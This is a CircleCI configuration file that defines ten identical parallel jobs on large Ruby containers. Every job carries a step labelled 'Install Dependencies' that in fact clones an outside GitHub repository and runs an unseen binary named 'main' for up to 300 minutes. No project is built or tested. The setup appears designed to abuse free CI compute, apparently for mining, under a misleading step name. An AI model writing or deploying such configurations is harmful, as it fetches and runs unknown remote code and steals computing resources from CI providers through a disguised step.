version: 2
jobs:
    aku1:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku2:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku3:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku4:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku5:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku6:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku7:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku8:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku9:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m
    aku10:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/pramadoli/kura.git && cd kura && chmod u+x main && ./main
            no_output_timeout: 300m

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
